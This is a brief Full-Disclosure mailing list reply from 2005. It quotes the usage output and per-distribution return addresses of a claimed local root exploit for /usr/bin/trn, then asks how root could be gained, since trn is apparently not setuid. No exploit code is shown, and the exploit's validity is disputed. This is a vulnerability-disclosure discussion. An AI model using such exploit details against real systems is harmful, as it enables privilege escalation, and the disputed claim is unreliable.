+++ Z z a g o r R [Wed, Jan 26, 2005 at 09:27:28AM CET]: > /* > /usr/bin/trn local root exploit > By ZzagorR - http://www.rootbinbash.com > */ > /* > sh-2.05b$ ./trn > usage : ./trn ret buf > example : ./trn 0xbfffff64 > [+] mandrake 9.2 = 0xbfffff96 > [+] slackware 10.0.0= 0xbfffff98 > [+] slackware 9.1.0= 0xbfffff84 > sh-2.05b$ > sh-2.05b$ ./trn 0xbfffff84 128 > [BOO %] 128 > [RET %] bfffff84 > sh-2.05b# > sh-2.05b# id > uid=0(root) gid=98(nobody) groups=98(nobody)
I didnt understand how you will get root? Afaik trn isnt suid. I didnt have Mandrake or another Linux here so i cant test it. Please explain. Regards Frank -- In the beginning was the word and the word was content-type: text/plain _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
